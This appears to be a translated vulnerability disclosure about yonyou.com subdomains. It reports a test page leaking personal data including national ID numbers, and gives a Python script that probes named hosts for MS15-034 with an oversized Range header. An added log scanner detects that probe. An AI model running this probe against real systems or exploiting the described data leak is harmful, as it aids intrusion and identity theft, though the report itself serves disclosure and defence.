### Brief description:

Information leaked: name / gender / date of birth / office phone / ethnicity / home address / national ID number / email / private phone / mobile number. That is enough to go open a bank card and recover an Alipay password...

### Details:

```
http://li.yonyou.com/test.aspx
```

Information leaked: name / gender / date of birth / office phone / ethnicity / home address / national ID number / email / private phone / mobile number

![1.png](https://images.seebug.org/upload/201511/11152802334b3796ca4fe2e1d3d0adb290722bc5.png)

In addition, several hosts are affected by the MS15-034 HTTP.sys remote code execution vulnerability:

```
http://h.yonyou.com/
http://hr.yonyou.com/
http://q.yonyou.com/
```

Detection PoC:

```
#!/usr/bin/env python3
__author__ = 'jastra'

import sys


class bg_colors:
    # ANSI colour codes for terminal output
    VULN = '\033[92m'
    NONVULN = '\033[95m'
    EXPLOIT = '\033[91m'


try:
    import requests
except ImportError as ierr:
    print(bg_colors.EXPLOIT + "Error, looks like you don't have %s installed" % ierr.name)
    sys.exit(1)


def identify_iis(domain):
    # Read the Server banner and continue only when it reports IIS
    req = requests.get(str(domain))
    remote_server = req.headers.get('server', '')
    if "Microsoft-IIS" in remote_server:
        print(bg_colors.VULN + "[+] 服务是 " + remote_server)
        ms15_034_test(str(domain))
    else:
        print(bg_colors.NONVULN + "[-] 不是IIS\n可能是: " + remote_server)


def ms15_034_test(domain):
    print(" 启动vuln检查!")
    # The Range value has to be sent as a request header, not as URL parameters
    req = requests.get(str(domain), headers={"Range": "bytes=0-18446744073709551615"})
    # An unpatched HTTP.sys answers 416 "Requested Range Not Satisfiable"
    if req.status_code == 416:
        print(bg_colors.EXPLOIT + "[+] 存在漏洞")
    else:
        print(bg_colors.EXPLOIT + "[-] IIS服务无法显示漏洞是否存在. " + "需要手动检测")


usr_domain = input("输入域名扫描: ")
identify_iis(usr_domain)
```

### Proof of vulnerability:

As above
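
A defender-side counterpart to the check in this report, as an added example that is not part of the original write-up: it scans request logs for the oversized `Range` value the MS15-034 probe sends. The log layout, the `range="..."` field and the 2^63 threshold are assumptions made for illustration.

```python
import re

# Assumption: any byte offset at or above 2**63 is treated as abnormal;
# the probe in the report uses 2**64 - 1 as the range end.
SUSPICIOUS_OFFSET = 2 ** 63

RANGE_RE = re.compile(r"^\s*bytes\s*=\s*(.+)$", re.IGNORECASE)


def suspicious_ranges(header_value):
    """Return the (start, end) pairs in a Range header whose offsets are abnormal."""
    m = RANGE_RE.match(header_value)
    if not m:
        return []
    hits = []
    for spec in m.group(1).split(","):
        start, sep, end = spec.strip().partition("-")
        if not sep:
            continue  # malformed range spec, nothing to compare
        bounds = [int(x) for x in (start.strip(), end.strip()) if x.strip().isdecimal()]
        if any(b >= SUSPICIOUS_OFFSET for b in bounds):
            hits.append((start.strip(), end.strip()))
    return hits


def scan_log(lines):
    """Return (client, path, hits) for each log line carrying an abnormal Range."""
    out = []
    for line in lines:
        # Constructed layout: client, method, path, then range="<header value>"
        m = re.search(r'^(\S+) \S+ (\S+) .*range="([^"]*)"', line)
        if m:
            hits = suspicious_ranges(m.group(3))
            if hits:
                out.append((m.group(1), m.group(2), hits))
    return out


# Constructed sample log lines (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 GET /video.mp4 status=206 range="bytes=0-1023"',
    '198.51.100.7 GET / status=416 range="bytes=0-18446744073709551615"',
    '203.0.113.5 GET /a.bin status=206 range="bytes=500-, 0-99"',
]

if __name__ == "__main__":
    for client, path, hits in scan_log(SAMPLE_LOG):
        print(client, path, hits)
```

A hit paired with a 416 response in the same log line is the combination the PoC above treats as a vulnerable host, so it is the case to triage first.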